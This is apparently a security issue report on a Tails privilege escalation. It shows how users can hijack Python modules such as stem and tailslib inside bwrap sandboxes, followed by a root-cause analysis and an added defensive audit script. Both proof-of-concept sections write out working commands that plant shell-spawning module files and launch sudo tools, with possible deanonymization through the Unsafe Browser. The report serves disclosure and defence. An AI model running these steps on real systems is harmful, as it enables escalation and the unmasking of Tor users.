
LPE from bwrap

https://git.radicallyopensecurity.com/otf/pen-tails/-/issues/2

tl;dr: afaik this does not immediately lead to the attacker becoming root, but is a promising start

User impact

An adversary who can already execute arbitrary code as the amnesia user can leverage this vulnerability to execute arbitrary code in the privileged contexts where these apps are running:

  • Unsafe Browser → may allow connecting to the Internet without going through Tor
  • Tor Connection → may allow configuring Tor
  • Tor Browser → may allow monitoring web browsing activity

In addition, the combination of these capabilities likely provides enough building blocks for successful deanonymization in the form of mapping specific Tor activity to a non-Tor IP address, and exfiltration of the results.

Similarly to #20709 (closed), we already accepted at least some of these risks in general, so the big difference here is the ability to do all these activities without it being visible on the desktop.

Practical exploitation path

Probably not from AppArmor-sandboxed apps (exploitation requires write access to /home/amnesia/.local/).

From ROS

I think I found a universal way to get into the bwrap sandboxes ^^ that use python3, e.g. /usr/local/bin/tca. Since it runs in the context of /usr/lib/python3/dist-packages/tca/application.py, it would be possible to get access to the inherited FDs, including the higher-privileged sockets and the network namespaces, that were open before the cap drop to the amnesia user happens, which can be seen here:

amnesia    20765  0.0  0.0   2576   912 pts/5    S    21:57   0:00 /bin/sh /usr/local/lib/run-with-ibus-and-a11y-bus-proxy -- /usr/bin/python3 /usr/lib/python3/dist-packages/tca/application.py
amnesia    20774  0.0  0.0   3360  1072 pts/5    S    21:57   0:00 bwrap --bind / / --proc /proc --dev /dev --bind /run/user/1000/.dbus-proxy/a11y-bus-proxy.sock /run/user/1000/tails-sandbox/a11y-bus-proxy.sock 
amnesia    20775  0.0  0.1  91564 13500 pts/5    S    21:57   0:00 /usr/bin/python3 /usr/lib/python3/dist-packages/tca/application.py
amnesia    20776  0.0  0.0   2576   904 pts/5    S    21:57   0:00 sh -c /bin/sh
amnesia    20777  0.0  0.0   2576   956 pts/5    S+   21:57   0:00 /bin/sh

PoC 1

Here we can see that we are in the sandbox (the amnesia user is in the group nogroup)

# create package which will we loaded later
mkdir -p /home/amnesia/.local/lib/python3.11/site-packages/stem

# drop payload
echo 'import os 
os.system("/bin/sh")
' >  /home/amnesia/.local/lib/python3.11/site-packages/stem/__init__.py

# trigger LPE
amnesia@amnesia:~$ cp -af /var/run/user/1000/user-env /tmp/foo && sudo ENVFILE=/tmp/foo /usr/local/bin/tca
$ id
uid=1000(amnesia) gid=1000(amnesia) groups=1000(amnesia),65534(nogroup)

PoC 2

mkdir -p /home/amnesia/.local/lib/python3.11/site-packages/tailslib/
cp -r /usr/lib/python3/dist-packages/tailslib /home/amnesia/.local/lib/python3.11/site-packages/

echo 'import os
print("Hello from hijacked tailslib :)") 
os.system("/bin/bash")
' >  /home/amnesia/.local/lib/python3.11/site-packages/tailslib/__init__.py

sudo /usr/local/sbin/unsafe-browser

Which yields

* Starting Unsafe Browser
Hello from hijacked Tailslib :)
amnesia@amnesia:~/.unsafe-browser/profile.default$ nano user.js # replace startup URL from the unsafe browser
exit

which will lead to deanonymization

Analysis

Potential root-cause analysis and observations: it was observed that the command bwrap --bind / / maps the entire root file system into the sandbox for the amnesia user. This configuration allows the amnesia user to place files in advance that could later be exploited during execution.

Examining the order in which Python3 loads libraries reveals that it first searches for the required libraries in the current working directory (in this case, /home/amnesia). Additionally, Python also searches the current user's home directory for libraries. Consequently, external libraries, such as stem, can be manipulated by an attacker to achieve code execution.

I think it would make sense to create a fully isolated sandbox with bwrap, like mounting an empty file system and then moving stuff into the directory, or it would make sense to adapt the system-wide Python3 load order ^^. This still holds for python3 root scripts ^^
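The two root causes named in this analysis (Python honouring the user's site-packages and cwd, and bwrap binding the whole root file system read-write) can both be checked mechanically. The following is an added example, not code from Tails or from the ROS report: python_search_path() spawns a child interpreter with a given set of flags and reports whether user site-packages and the current directory are on its module search path, and audit_bwrap_argv() parses a bwrap command line and flags the patterns seen in the ps output above. The hardened bwrap argument list in main() is an assumption for illustration (a read-only root plus a tmpfs over the home directory), not a complete or proposed Tails sandbox profile.

```python
"""Added example (not Tails or ROS code): checks for the two root causes
discussed above, the interpreter's module search path and a bwrap command
line that binds the whole root file system read-write."""
import json
import os
import subprocess
import sys


def python_search_path(extra_args=(), env_overrides=None):
    """Spawn a child interpreter with the given flags/environment and report
    whether it honours the user site-packages directory and whether the
    current directory is on sys.path. Uses sys.executable, so the result
    describes the interpreter running this check, not necessarily
    /usr/bin/python3 on Tails."""
    env = dict(os.environ)
    env.update(env_overrides or {})
    probe = (
        "import json, site, sys;"
        "print(json.dumps({'enabled': bool(site.ENABLE_USER_SITE), 'path': sys.path}))"
    )
    proc = subprocess.run(
        [sys.executable, *extra_args, "-c", probe],
        env=env, capture_output=True, text=True, check=True,
    )
    info = json.loads(proc.stdout)
    return {
        # True means ~/.local/lib/pythonX.Y/site-packages would be searched
        "user_site_enabled": info["enabled"],
        # '' (or the cwd) sits at the front of sys.path for -c / interactive use
        "cwd_on_path": "" in info["path"] or os.getcwd() in info["path"],
    }


# bwrap options that take (src, dest) versus a single dest argument
TWO_ARG = {"--bind": "rw", "--dev-bind": "rw", "--ro-bind": "ro"}
ONE_ARG = {"--tmpfs": "tmpfs", "--proc": "proc", "--dev": "dev"}


def _covers(mount_dest, path):
    """True if a mount at mount_dest contains path."""
    return (mount_dest == "/" or path == mount_dest
            or path.startswith(mount_dest.rstrip("/") + "/"))


def audit_bwrap_argv(argv, home="/home/amnesia"):
    """Return a list of findings for a bwrap command line (constructed heuristic).
    Mounts are recorded in command-line order because a later mount shadows an
    earlier one, so a --tmpfs over $HOME after --ro-bind / / is what counts."""
    findings = []
    mounts = []  # (kind, dest) in order
    i = 0
    while i < len(argv):
        opt = argv[i]
        if opt in TWO_ARG and i + 2 < len(argv):
            src, dest = argv[i + 1], argv[i + 2]
            if TWO_ARG[opt] == "rw" and src == "/" and dest == "/":
                findings.append("whole root file system is bound read-write (--bind / /)")
            mounts.append((TWO_ARG[opt], dest))
            i += 3
        elif opt in ONE_ARG and i + 1 < len(argv):
            mounts.append((ONE_ARG[opt], argv[i + 1]))
            i += 2
        else:
            i += 1
    last_kind = None
    for kind, dest in mounts:
        if _covers(dest, home):
            last_kind = kind
    if last_kind == "rw":
        findings.append(f"{home} is writable inside the sandbox (user site-packages can be pre-seeded)")
    return findings


def main():
    # Constructed from the ps output above (sandbox as observed)
    sock = "/run/user/1000/.dbus-proxy/a11y-bus-proxy.sock"
    observed = ["bwrap", "--bind", "/", "/", "--proc", "/proc", "--dev", "/dev",
                "--bind", sock, "/run/user/1000/tails-sandbox/a11y-bus-proxy.sock"]
    # Assumed hardened variant for illustration: read-only root, empty home
    hardened = ["bwrap", "--ro-bind", "/", "/", "--tmpfs", "/home/amnesia",
                "--proc", "/proc", "--dev", "/dev",
                "--bind", sock, "/run/user/1000/tails-sandbox/a11y-bus-proxy.sock"]
    print("observed:", audit_bwrap_argv(observed))
    print("hardened:", audit_bwrap_argv(hardened))
    for label, args, env in (("default", (), None), ("-s", ("-s",), None),
                             ("-I", ("-I",), None),
                             ("PYTHONNOUSERSITE=1", (), {"PYTHONNOUSERSITE": "1"})):
        print(f"{label:>18}:", python_search_path(args, env))


if __name__ == "__main__":
    main()
```

Running it prints the findings for the observed command line (both root-cause patterns) and none for the hardened one, and shows that `-s`, `-I` or `PYTHONNOUSERSITE=1` each stop the interpreter from consulting the user site-packages directory, with `-I` also dropping the current directory from sys.path. Note that `-I` applies per invocation of a script, so it covers the root-launched Python scripts mentioned above only where their wrappers pass it.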

anyway, one needs to come up with new stuff in order to pwn Tails ^^

Edited by boyska